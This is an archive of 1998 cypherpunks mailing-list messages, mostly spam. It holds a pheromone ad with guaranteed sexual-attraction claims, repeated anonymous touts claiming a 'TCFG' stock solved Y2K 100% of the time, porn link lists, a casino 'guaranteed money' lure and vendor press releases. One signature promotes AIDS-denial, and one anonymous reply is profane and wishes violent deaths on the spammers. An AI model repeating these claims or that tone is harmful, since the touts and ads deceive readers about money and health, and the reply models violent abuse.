The Mailing List that you are being mailed from was filtered against
a Global Filter List. If you would like not to recieve any other mailings of this type please send an email to: removemenow@start.com.au with remove in the subject line.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: totospitter@3253137429
Date: Mon, 19 Oct 1998 15:41:51 -0700 (PDT)
To: chico@3253137429
Subject: You'll be their wish in life!
Message-ID: <199810192241.PAA11519@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


BOOST YOUR SEX APPEAL AND CHANGE YOUR SOCIAL AND SEX LIFE FOREVER. 

SCIENCE AND NATURE'S SEXUAL SECRET WEAPON! 

Scientists have isolated the natural Human male/female Pheromone attractants 
and they are NOW available to YOU, legally, in the US. 

ATTRACT THE OPPOSITE SEX LIKE NEVER BEFORE ! 
IT'S GUARANTEED, or you pay nothing! 


PHEROMONES in the News! 

>From the NY Times to the LA Times. USA Today, The Wall Street Journal, Psychology Today, 20/20, Hard Copy, Single Living, Medical Tribune, Philadelphia Inquirer, Dateline, Discovery, Hustler, Playboy, Rocky Mountain News, McCalls, Penthouse, Cosmopolitan, BBC-TV, Colordao Telegraph, GQ, Time, Redbook, Fortune Magazine, and more.  Radio and Television Stations worldwide.  All have reported the scientific findings amidst excitement, controversy, commotion and thrill about pheromones and their potential use. 


The Press Has Said it Better Than We Can. 

"PUT IT TO THE TEST" MERIDIAN TV: 
Sold extensively in the UK, phermomones were tested live on television in the UK, when the unknowing female presenter was VERY ATTRACTED to one of the twin guys,  he was wearing "Androstenone Pheromone"  but she did not know this, and did not know why she was attracted to him ! 

US NEWS and WORLD REPORTS 
"The key to starting a love affair might be right under your nose. Scientists have just announced the discovery of a virtual sixth sense, a tiny organ in the nasal cavity that responds to chemicals known as pheromones. These natural substances are thought to play a role in basic human emotions such as fear, hunger--and love." 
FORTUNE MAGAZINE:  
"An imaginative University of Utah anatomist named David L. Berliner was working with substances that occur in human skin. When he left some of the extracts in open vials around the lab, he noticed a sudden, puzzling rise in camaraderie among a previously acrimonious group of researchers working with him. When he changed the extracts a 
few months later, the group resumed its contentious ways. Berliner froze and saved the extracts. 
Nearly 30 years later, ...  thanks to a method of containing drugs and cosmetics inside tiny, spongelike polymer spheres, he returned to the subject. In 1989 he ... has isolated the suspected good-fellowship pheromones -- behavior-controlling substances similar to those already known to stimulate sexual activity in animals. (One whiff of a pheromone called aphrodisin from a female hamster and a male is ready to mate.) 

On March 3, 1998 FOX Affiliate, WSVN in Miami did a story on Pheromones, stating, "If you're looking for love, we've got a potion for passion." ...  "Tonight, a secret weapon to attract the opposite sex.  Researchers developing their own passion potion. Ever been attracted to someone but weren't really sure why? .... More and more research is pointing to chemicals these days.... undetectable chemicals... pheromones ... a clear odorless liquid" 

Customers Say: 

"... works as advertised, best product of its' kind" 

I've always had trouble meeting women-then I tried your product.  Now girls come up to me and introduce themselves all the time! I'd like to know if your product is available in a larger quantity so I can make sure I'm never without it! 
-Dave J 

I've been driving a tractor trailer for about 6 years and I'm on the road all the time. It's been impossible to meet women until I tried pheromones.  Now every truck stop I pull into I meet new women, and many of them ask me out. Thanks! 
-Tom on the Road Again, 

WHAT ARE PHEROMONES? 

Pheromones are a naturally occurring chemical compound found in all insects, all animals, and in humans. When pheromones are secreted they dictate sexual behavior and attract the opposite sex.  Be careful. Animal pheromones do NOT attract humans. 

Have you ever wondered why people who are not particularly attractive seem to attract dates like flies to honey?  They seem to have some "chemical attraction" about themselves. Some call it animal magnetism. It may be pheromones.  Now you can have that "chemical attraction" whenever you want. 

PHEROMONES - THE FACTS 

       Pheromones are natural chemicals which play an important role in sexual communication. 

       Animals, including humans release chemicals in tears, saliva and perspiration. These chemicals send signals relating to mood and health to the subconscious awareness.  One theory is that the dominant male will exude more of these chemical attractants than a submissive or weaker male.  This chemical attracts more females to him.  It is similar for woman attracting men. This natural attractant can also contribute to more 
intense excitement during love making (sexual foreplay and sexual intercourse). Pheromones may also contribute to the dating phrase, "chemical attraction" that we all talk about.  WSVN-TV (March 3, 1998) "Ever been attracted to someone but weren't really sure why? .... More and more research is pointing to chemicals these days.... undetectable chemicals... pheromones ... a clear odorless liquid" 


MORE RESEARCH AND REFERENCES: 
Following is some research done on products made by our manufacturer, and bottled under a different name.  It contains the same pheromone type and content as Hi-Octane
http://www.angelfire.com/fl/beaches69/index.html 



ABOUT OUR PRODUCT: 

Hi-Octane (tm) 

.. is made up of PHEROMONES suspended in witch hazel.. This product is designed to be added to your favorite cologne or perfume. 

.. contains both male and female PHEROMONES. Nature never intended for 
just one PHEROMONE to be present; but two, male and female. Our manufacturering process uses both PHEROMONES in ALL our products. This will not attract same sex; 
but works as nature intended, attracting the opposite sex. 

.. comes in 1/8 oz. Bottle with a small funnel so you can easily pour it into 
your cologne or perfume. One 1/8 oz. bottle is enough to mix with 4 to 8 oz of 
your favorite perfume product.  

Similar pheromone products have been sold for up to $100 elsewhere. We sell the the strongest product on the market today for only $39.95. 

BUY two -- get one free. 

The world's largest manufacturer of Pheromones, MC Marble, now manufactures Hi-Octane (tm), a pheromone prodcut that is the "Most Powerful sexual attractant on the Market today." 

HI_OCTANE is made with two powerful synthesized human 
pheromones, Alpha-Androstenol and Alpha-Androstenone. 

HI-OCTANE  will attract the opposite sex of the wearer.  McCall's magazine writes 
"...pheromones can improve one's love life, pheromones send out subconscious 
scent signals to the opposite sex that naturally trigger romantic feelings." 

HI-OCTANE  according to the manufacturer, may also intensify sex, by increasing sexual pleasure and endurance of both partners, and creating a higher sexual ecstasy. Individual results may vary.   One private study claims that pheromones don't work for everyone. 75% of those trying it had success.  Isn't it worth trying? 

HOW TO ORDER Hi OctaneTM 

Hi OctaneTM is available from Euphoria Products. 

A 1/8 oz. bottle with a convenient funnel (to be added to your favorite perfume) is 
$39.95. Mix 1/4 of the bottle with every 2 oz of your favorite product. One 1/8 oz. bottle is enough to mix with 4 to 8 oz of your favorite product. 

                         *** 

  For a limited time, when you order two bottles (up to a two month's supply) of Hi Octane(tm), you'll get a third bottle ABSOLUTELY FREE. 

                         *** 

Please add $3.00 shipping and handling per order. (regardless of how many bottles you order, you pay only $3.00 total!) 

UPS Second Day Air Delivery is available for an additional $9.00 per order.  Overnight, add $15.00 per order. 

Florida residents, please add applicable sales tax. 

For orders from outside of the US only ground shipping is available for $15. 

Our manufacturing facility offers the STRONGEST pheromones on the market today. Our manufacturing facility assures you that Hi-Octane will be always contain the male and female pheromones, the way nature intended it, to best attract the opposite sex for you. It is and will always be manufactured with the finest ingredients to assure your satisfaction. 



                        SATISFACTION GUARANTEED 

Try Hi OctaneTM risk-free. Your satisfaction is unconditionally guaranteed. If you do not find you are meeting and dating and scoring with more people of the opposite sex after using High OctaneTM for 30 days, simply return the unused portion of your order at any time for a full refund--no questions asked. 



Call 520-453-0303 Extension 202,  24 hours/day, 7 days/week for credit card orders. Have your MasterCard, Visa, American Express, and Discover Card  ready and say, " I would like to order ___ bottles of High Octane." 

If you would like to order by mail, you can send in a check or money order, or credit card information,  along with your name and street address (no PO Boxes please) and a day time phone number to: 

                         Euphoria Products Dept. 202 
                    1859 No Pine Island Rd. Suite #133
                            Plantation, FL 33322 












The Mailing List that you are being mailed from was filtered against
a Global Filter List. If you would like not to recieve any other mailings of this type please send an email to: removemenow@start.com.au with remove in the subject line.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: christine@1stnettech.com
Date: Mon, 19 Oct 1998 18:56:49 -0700 (PDT)
To: christine@1stnettech.com
Subject: ADV: U.S. Patent Office Grants Patent On QPI's Breakthrough
Message-ID: <199810191753.SAA02524@websites>
MIME-Version: 1.0
Content-Type: text/plain


U.S. Patent Office Grants Patent
On QPI's Breakthrough
PhotoMotion Multi-Imaging Technology

Quik Pix Inc. Buena Park, CA (OTCBB SYMBOL: QPIX) announced today that the Company has been granted the Patent on a breakthrough technology, PhotoMotion Multi-Imaging.  QPI is a company specializing in high quality photographic imaging and visual marketing technologies.

The Patent just awarded covers the technology enabling QPI to combine three or more images into a single color transparency that, as if by magic, changes as the astonished viewer moves past the image.  The image moves with the viewer.  The illusion is optical and requires no special equipment or other mechanism to create this mystical effect.

PhotoMotion Multi-Imaging Technology images combined with text or graphics readily fit into existing light box fixtures creating a visual presentation that is so amazing and distinct that PhotoMotion stands to revolutionize the imaging for most backlit advertising displays used in tradeshows, point of purchase locations, foot traffic venues, etc.

Mr. John Capie, QPI President, said, "Everyone who sees PhotoMotion is very enthusiastic.  The responses from advertisers, marketers, and photo industry people have been very positive.  This is going to be a photographic milestone."

For more information about our company and this investment opportunity, please visit 
http://www.1stnettech.com/qpix/

This news release includes forward-looking statements that are subject to risks and uncertainties, including risks associated with the company's: (1) entry into new markets and development and introduction of new products; and (2) the company's need to finance costs related thereto. Actual results may vary from those projected or implied by such statements. 

Quik Pix Inc.
7050 Village Drive Suite F
Buena Park, CA. 90621 
John Capie
President
Inside Southern California - 800-734-0432
Outside Southern California - 714 522-8255

_________________________________________________________________________
Further transmissions to you by the sender of this e-mail may be stopped at no cost
to you by replying to remove@1stnettech.com 
                       We apologize for any inconvenience





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED TUE OCT 20 <stuffed@stuffed.net>
Date: Tue, 20 Oct 1998 08:14:13 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981020071000.4746.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ ULTRA FREE XXX
+ ABSOLUT FREE HARDCORE
+ BIMBO DIGEST
+ ASIAN ACTION
+ BOOBS R US
+ ALL DAY PUSSY PARTY
+ MISS TEASE FREE XXX PLAYHOUSE
+ HOT SEX 4 U
+ THE IDEAL NUDE BEACH
+ GALLERY XXX
+ BONUS PIC 1 -> http://www.stuffed.net/home/29645.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/20932.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/31091.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/31754.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/21188.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@tcii.net
Date: Tue, 20 Oct 1998 09:00:01 -0700 (PDT)
Subject: NEW SECURE INFO MANAGEMENT SYSTEM
Message-ID: <B0000005722@mail.tcii.net>
MIME-Version: 1.0
Content-Type: text/plain



Subject: NEW SECURE INFORMATION TECHNOLOGY ANNOUNCEMENT

The reason that we are communicating to you is simple.  We understand that you are concerned with information security solutions and we need to get the news out about a new kind of technology, which we call Premonition.  You need to know that this brand new class of secure Internet publishing technology is in the final phase of development and our company is working hard to make it available!  Please take just a few moments to visit our web page located at www.tcii.net/premonition.  You will find that there are no requests to purchase anything.

We believe our company is on target and that information-based businesses and clients who need secure publishing will benefit.  This is an enormous opportunity involving the entire information publishing industry so we know we need help.  During this final development phase our company is now beginning to organize a network of business contacts across the country and around the world including those who may wish to participate or become associated with us in this venture.  For you to understand what this means you need an opportunity to visit our website at www.tcii.net/premonition.

So come to our web site for a visit.  If you like what you see then you can send us an email reply from our address on our web page. We know that you will find the general concept of our technology interesting and we will appreciate constructive suggestions.

But please do not wait and do not delay; this is a limited one-time window of opportunity for you to consider.  After this message your email address will be automatically added to our remove list and we will not try to target your address again.  We must limit the number of people we will send this message to.  However, you are welcome to forward this message on to other qualified professionals who you think may be interested.

We want to thank those of you who choose to participate for your honest review of www.tcii.net/premonition. You will see that sometimes it can be refreshing and worth your while to take a look at new information that drops in your email.

Sincerely,
Transaction Control International, Inc.
Memphis, Tennessee

www.tcii.net/premonition





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pop7@angelfire.com
Date: Tue, 20 Oct 1998 22:21:20 -0700 (PDT)
To: <pop7@angelfire.com>
Subject: CREDIT CARD PROCESSING
Message-ID: <NetContact.10/20/98.83484.33.pop7@angelfire.com>
MIME-Version: 1.0
Content-Type: text/plain



***************************************************************
To be REMOVED from further mailings please respond with 
the word "remove" to the address listed below. DONOT
reply to the address listed in the headers.
***************************************************************

Dear Friend,

Discover how you can accept credit cards directly
from your website, telephone or fax for your products 
and services and never need to purchase or lease
expensive credit card equipment or pay a monthly 
large fee for online ordering capabilities?

**Brand New**  Inteli-Charge Credit Card acceptance program 
allows you to accept VISA or Mastercard any TIME,any WHERE 
through phone, fax or internet without the need to purchase 
or lease expensive credit card equipment. This brand new 
program will allow you to accept credit cards tomorrow.
You simply pick up your telephone, dial a special toll free
800# 24 hrs a day 7 days a week, input a passcode and the
credit card # and receive an immediate authorization over the phone.
Within 2 days the money is deposited in your bank account. This is
an exciting program for all businesses. Before you spend any money
on a credit card program LOOK at this new program! 

If you have an interest in learning more about a Merchant Account 
for yourself or your business please email your Name, PHONE NUMBER 
(Don't forget your area code) and best time to call to:

mailto:cardacct1@freeaccount.com
 
A representative will return your call within 24hrs.

Or feel free to call us on our 24 hour voicemail at:

1-800-600-0343 Ext:2104

P.S. ALSO AS PART OF A SPECIAL NATIONAL PROMOTION, IF
YOU ACT NOW YOU WILL RECEIVE A FREE ONLINE 
STORE WITH SECURE ORDERING CAPABILITIES
TO SELL YOUR PRODUCTS ONLINE! 


World Teknologies Inc.
7210 Jordan Ave.
Ca. 91303











































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: insight@sprynet.com
Date: Wed, 21 Oct 1998 03:44:03 -0700 (PDT)
Subject: No Subject
Message-ID: <199810211043.DAA04842@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


10/21/98

Y2K  Solution...
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for..... 

----------------------------------------------------------------

  
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED WED OCT 21 <stuffed@stuffed.net>
Date: Wed, 21 Oct 1998 13:47:46 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981021071000.26414.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ ALL THAT ASS
+ ANAL DELIGHT
+ NYMPHO9
+ GOT XXX?
+ GOO GOO'S PLEASURE PALACE
+ MAD MAX'S ULTIMATE BABES
+ EARTHQUAKE NUDE WOMEN
+ SEX HAPPY
+ WHACKOHOLICS ANONYMOUS
+ HOT BABES
+ BONUS PIC 1 -> http://www.stuffed.net/home/24259.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/32166.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/12459.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/13509.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/17450.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nations@freeyellow.com
Date: Wed, 21 Oct 1998 13:32:31 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199810212032.NAA11733@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


                             10/21/98

Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for.....



 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jack Oswald / CEO / RPK Security" <Announcements_reply@rpkusa.com>
Date: Wed, 21 Oct 1998 14:40:28 -0700 (PDT)
To: Announcements@rpkusa.com
Subject: ANNOUNCEMENT: RPK SECURITY'S "SAFECRACKER CHALLENGE" INVITES USERS TO "BREAK" RPK ENCRYPTONITE ENGINE AND WIN $10,000
Message-ID: <199810212135.OAA11043@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


You have received this message because at some time in the past your name was submitted to our e-mail mailing list database.  If you do not wish (or no longer wish) to receive announcements, updates and news concerning the RPK Encryptonite Engine or the RPK InvisiMail e-mail security products, please forward this message to remove@rpkusa.com

-----------------------------------------------------------------------

CONTACT
Paula Miller							Lyn Oswald
Nadel Phelan, Inc.						RPK Security Inc.
408-439-5570 x277						212-488-9891
paulam@nadelphelan.com					lynoswald@rpkusa.com	


RPK SECURITY'S "SAFECRACKER CHALLENGE" INVITES USERS TO "BREAK" RPK ENCRYPTONITE ENGINE AND WIN $10,000

SAN FRANCISCO, CA. October 21, 1998 - RPK Security, Inc. (www.rpkusa.com), a technology leader in fast public key encryption, announced today the "SafeCracker Challenge", a contest offering US$10,000 to the first person who breaks the technology behind the company's uniquely fast public key cryptosystem, RPK Encryptonite Engine. 

In order to receive the cash reward, participants must download the encrypted test document and test public key from RPK Security's website, www.rpkusa.com, and then submit via email the private key that corresponds to the current test public key, or the correctly decrypted test document.

"We're launching the SafeCracker Challenge to demonstrate that the RPK Encryptonite Engine provides the most secure, fast and flexible public key system on the market today," said Jack Oswald, president and CEO of RPK Security. "Recently patented in New Zealand and the US, the technology behind the RPK Encryptonite Engine is based on the same mathematics as Diffie-Hellman Key Exchange, a widely used algorithm for creating secure network-based communications systems, and is highly respected by security experts." 

The RPK Encryptonite Engine is a uniquely fast public key algorithm for encryption, authentication and digital signatures. It offers a combination of the benefits of commonly used public key systems (ease of key management, authentication and digital signatures) and the high performance characteristics of commonly used symmetric or "secret key" systems. Developed outside of the U.S., the RPK Encryptonite Engine is available globally with strong encryption, unlike competing products that are restricted by U.S. export regulations.

ABOUT RPK SECURITY
Founded in 1995, RPK Security, Inc. is a technology leader in fast public key cryptography.  Its flagship RPK Encryptonite(tm) Engine, a uniquely fast and strong public key encryption technology, is available worldwide in custom hardware and software toolkits on multiple platforms.  Developed from widely accepted security mathematics and techniques, the RPK Encryptonite Engine is easily embedded into new and existing hardware and software applications.  RPK's cryptographic research and product development is based in New Zealand, Switzerland and the U.K, with worldwide sales and marketing operations in San Francisco, CA.  Visit RPK's website at www.rpkusa.com or call (212) 488-9891.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: casinofun@who.net
Date: Wed, 21 Oct 1998 08:52:04 -0700 (PDT)
Subject: Internet Casino Lottery - Enter at No Cost
Message-ID: <199810211449.OAA11354@intersky.com>
MIME-Version: 1.0
Content-Type: text/plain


Enter at No Cost!

The time has come to enjoy casino games from the comfort of your home.
Find out where to play all of your favorite casino games online securely.
Blackjack, Craps, Slot Machines, Roulette, Baccarat, Bingo & Much More! The
best odds. Huge pay-outs. Top-Rated Customer Service.

For more information, reply below IMMEDIATELY and you will be GUARANTEED
TO RECEIVE between $25.00 and $10,000.00.  What better way to visit the
best Casino's on the Internet?  Use their dollars and enjoy the best online
Casino's the world has to offer.  If you enjoy Casino gaming then this is
for you.  You need to reply today for more information and guaranteed
acceptance.

You must respond NOW at OffshoreCasinoLottery@bigfoot.com and type
"SHOW ME THE MONEY" in the Subject line of the message.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jack Oswald / CEO / RPK Security" <Announcements_reply@rpkusa.com>
Date: Wed, 21 Oct 1998 15:34:46 -0700 (PDT)
To: Announcements@rpkusa.com
Subject: ANNOUNCEMENT: INVISIMAIL INTERNATIONAL LTD. ANNOUNCES RPK InvisiMail VERSION 3.0
Message-ID: <199810212219.PAA10544@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


You have received this message because at some time in the past your name was submitted to our e-mail mailing list database.  If you do not wish (or no longer wish) to receive announcements, updates and news concerning the RPK Encryptonite Engine or the RPK InvisiMail e-mail security products, please forward this message to remove@rpkusa.com

-----------------------------------------------------------------------

CONTACT
Paula Miller							Lyn Oswald
Nadel Phelan, Inc.						RPK Security Inc.
408-439-5570 x277						212-488-9891
paulam@nadelphelan.com					lynoswald@rpkusa.com		

INVISIMAIL INTERNATIONAL LTD. ANNOUNCES RPK InvisiMail VERSION 3.0

New York, NY, October 21 1998 - InvisiMail International, Ltd., (www.InvisiMail.com) announced today the latest release of its RPK InvisiMail Intro 3.0 and RPK InvisiMail Deluxe 3.0 e-mail encryption products. RPK InvisiMail provides individual e-mail users with the easiest solution for automatically and transparently encrypting e-mail messages and attachments. The first e-mail security product with globally strong encryption, RPK InvisiMail integrates seamlessly with more e-mail products than any other security solution available today. RPK InvisiMail enables authentication of the sender and verifies contents have not been changed in transit.

RPK InvisiMail Intro provides fast, secure (607bit) encryption for e-mail messages and attachments, and is unobtrusive allowing e-mail which is sent to non-InvisiMail users to be simply and intelligently passed as a conventional e-mail message.  RPK InvisiMail Deluxe adds an even higher level of security (up to 1279bit) and provides features such as e-mail compression that reduces transmission time, and digital message signatures to validate senders.
 
InvisiMail International also offers RPK InvisiMail Enterprise Edition, a strong corporate e-mail security add-in. RPK InvisiMail Enterprise Edition's flexible design allows corporate IT managers to configure e-mail security for individual users, networks and gateways.
More

Pricing and Availability
The RPK InvisiMail Intro version is free. The Deluxe version retails for $29.95 U.S. Both the Intro and the Deluxe versions are available for download from the InvisiMail International web site at www.InvisiMail.com. Pricing for RPK InvisiMail Enterprise Edition is based on the number of seat licenses and starts at $100 per user.

ABOUT InvisiMail INTERNATIONAL LTD.
InvisiMail International Ltd., founded in 1997, specializes in secure Internet commerce and communications solutions for a wide range of applications. Developed using RPK Security, Inc.'s core technology, the RPK Encryptonite Engine, the InvisiMail range of products supports secure message-based applications including Client Services ECommerce, EDI and others that require absolute confidentiality and the highest security levels.  This allows the simplest e-mail systems to become the most powerful business and commerce tools.  Contact InvisiMail at www.InvisiMail.com or call +44 1624 611 003.

ABOUT RPK SECURITY
Founded in 1995, RPK Security, Inc. is a technology leader in fast public key cryptography.  Its flagship RPK Encryptonite Engine, a uniquely fast and strong public key encryption technology, is available worldwide in custom hardware and software toolkits on multiple platforms. Visit RPK's website at www.rpkusa.com or call (212) 488-9891.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Member Benefits <benefits@biztravel.com>
Date: Thu, 22 Oct 1998 07:46:22 -0700 (PDT)
To: Member Benefits <benefits@biztravel.com>
Subject: Biztravel.com Free $50 Gift
Message-ID: <362E517D.6A64099C@biztravel.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Biztravel.com member,

I'd like to remind you that the incredible $50 gift offer
we told you about last month expires on 10/31/98.

We'll give you a $50 American Express(R) Gift Cheque
FREE with your first flight purchase*!

But you must ACT QUICKLY:
-  purchase and commence travel on your first flight by 10/31/98
-  after you take your trip we'll mail your gift

So if you have a trip to take before the end of October,
book it now at http://www.biztravel.com.

++++++++++++++++++++++++++++++++++++++++++
+++ Plan and book all your travel with Biztravel.com +++
++++++++++++++++++++++++++++++++++++++++++
With Biztravel.com, you can:
- purchase airline flights
- reserve rental cars and hotel rooms
- view all your flight options according to
  your personalized travel preferences
- have electronic tickets waiting for you at
  the airport, or get overnight delivery of tickets
- call our 24-hour-a-day customer service center
  for last minute travel assistance
- track your frequent flyer account balances
- have our free paging service, bizAlerts, alert
  you to last-minute flight changes
- and more!

We appreciate your membership at Biztravel.com.
Visit http://www.biztravel.com today to plan and
book your next trip.

Sincerely,
John I. Williams, Jr.
President & CEO
Biztravel.com(R)
++++++++++++++++++++++++++++++++++++++++++
*Full details regarding this special gift offer are at:
<http://www.biztravel.com/gift50b>
++++++++++++++++++++++++++++++++++++++++++
Biztravel.com members are periodically informed of new
products and special offers.  To modify your membership
preferences, go to <http://feedback.biztravel.com/survey/noemail.htm>.
++++++++++++++++++++++++++++++++++++++++++





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Wed, 21 Oct 1998 15:43:40 -0700 (PDT)
To: Tim Griffiths <griffith@wis.weizmann.ac.il>
Subject: Re: Women cannot commit rape?
In-Reply-To: <362DD16D.2B1A6570@wis.weizmann.ac.il>
Message-ID: <3.0.2.32.19981021183752.0097b390@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This judge obviously never heard of being "Scared stiff!" (I'm not 
joking!)

At 02:19 PM 10/21/98 +0200, you wrote:
>French Supreme Court rules that women cannot commit rape
>
>Copyright (c) 1998 Nando.net
>Copyright (c) 1998 Reuters News Service
>
>PARIS (October 21, 1998 06:38 a.m. EDT http://www.nandotimes.com) -
>France's
>Supreme Court ruled on Wednesday that women are unable to commit the
>crime of
>rape because they cannot sexually penetrate men.
>
>"The material element of the crime of rape is only realized if the
>perpetrator
>commits the act of sexual penetration on the person of the victim," 
it
>said in
>its judgment.
>
>The court, known as the Cour de Cassation, overturned a lower court
>ruling
>that Catherine Maillard could be tried for rape on charges of 
forcing
>her
>underage stepson to have sex with her repeatedly between 1986 and 
1992.
>
>Maillard could only be tried for "aggravated sexual aggression" 
against
>the
>boy, while his father Michel Deloisy had to be tried for "moral
>abandonment of
>a child" instead of the original charge of "complicity in aggravated
>rape,"
>the court said.
>
>With its judgment, the court seemed to contradict an earlier ruling 
it
>issued
>in December 1997 saying that forcing someone to perform oral sex act 
was
>legally equivalent to rape.
>
>
>--
>Tim Griffiths                   griffith@wis.weizmann.ac.il
>Center for Submicron Research   http://tim01.ex.ac.uk
>Weizmann Institute of Science   (972)-8-934-2736
>Rehovot 76100 Israel
>PGP Public key available - finger tim@tim01.ex.ac.uk
>
>The real value lies not in what I say or do,
>but in your reaction to it.  -DF
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNi5iP0mNf6b56PAtEQLGSgCfTGnGghfeKzUqgbvqcdcQweSdmecAoIUF
IKfm8vWr74WI/yLlFkqMO6lr
=UchJ
-----END PGP SIGNATURE-----


When freedom is outlawed.......Only outlaws will be free!

If cryptography is outlawed, pomz pvumbxt xjmm ibwf dszquphsbqiz.

Fun! Fast! Revealing! Try "The World's Smallest Political Quiz" at:
   http://www.self-gov.org/quiz.html

IS AIDS A GOVERNMENT/DRUG COMPANY HOAX?
   http://www.virusmyth.com/aids/index.htm

When you blame others, you give up your power to change.
Dr. Robert Anthony

Libertarian Party of Hillsborough County, FL
   http://home.tampabay.rr.com/lphc

When a place gets crowded enough to require ID's, social collapse is not far
away. It is time to go elsewhere. The best thing about space travel is that
it made it possible to go elsewhere.

Lazarus Long




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 21 Oct 1998 14:51:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199810212150.XAA07067@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's an idea.  FUCK OFF!  Why don't you go stick a Y2k
bowling ball up your ass, and never post here again, you
degenerate piece of shit!  Or better yet, take every member of
your administrative research department, march them up to the
roof of the highest building in Silicon Valley, and push them all
off!  Then throw yourself off, you spineless maggot!

The only letters I'm looking for are the ones signed by Janet Reno
to the BATF to march in and kill your entire employee base.  Please
let me know when those arrive.


At 12:55 PM 10/21/98 +0000, nations@freewilly.com wrote:
>                             10/21/98
>
>Y2K  Solution!
>8  Pine  Circle  Dr., Silicon  Valley, Calif.
>
>OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
>through  several  members  of  their  administrative  research
>department  leaked  vital  information  about  their  companies  
>efforts.
>
>Everyone  was  tight  lipped  and  interviews  were  refused,
>and  through  un-named  sources  we  have  learned  that  the  
>technology  and  software  solution  are  in  the  process  of  
>being  patented!
>
>In over  1640  trials, using  various  data  systems  the  use  
>of  the  new  technology  and  software  solved  the  Y2K
>problem  100%  of  the  time. 
>
